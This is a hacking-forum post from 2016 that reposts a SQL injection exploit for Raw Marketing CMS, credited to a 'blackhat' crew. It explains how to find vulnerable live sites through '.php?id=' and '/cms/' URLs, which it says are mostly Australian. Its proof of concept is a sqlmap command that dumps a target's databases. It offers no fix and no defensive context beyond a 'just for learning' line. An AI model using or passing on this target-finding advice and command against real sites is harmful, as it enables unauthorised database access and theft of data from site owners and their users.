+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html)
+--- Thread: Exploit Raw Marketing CMS - SQL Injection Vulnerability (/thread-69.html)
Exploit Raw Marketing CMS - SQL Injection Vulnerability - Local Host - 03-17-2016
Salam Kenal,
Member Baru,
Exploit ini cuma sekedar pembelajaran
Code:
# Exploit Title: Raw Marketing CMS - SQL Injection Vulnerability
# Date: 24/01/2015
# Exploit Author: Local Host
# Author Homepage: pasuruanblackhat.org
# Version: All Version ( Under 2015)
# Tested on: Ubuntu 14.04
Overview :
The CMS is vuln on all .php?id= , so you only search .php?id= in the website. you know if the website is use Raw Marketing CMS only give /cms/ in the url . and you can see login admin Raw Marketing CMS, usually the CMS in AU, because the vendor of this CMS is australian people. The SQLI error is not show warning, just show not perfectly page. Iam reported to vendor but not responsive, It's not joke
PoC :
http://www.website.com.au -> http://www.website.com.au/product_detail.php?id=1
sqlmap -u http://www.website.com.au/product_detail.php?id=1 --dbs
Greet :
Pasuruan Blackhat & Pasuruan Cyber Crew
phiA , Alliend , 1pan , h3ll0s , 1nspiron , p3707 , Dark Wireless , h4715 , SychulAtau bisa lihat disini 0day.today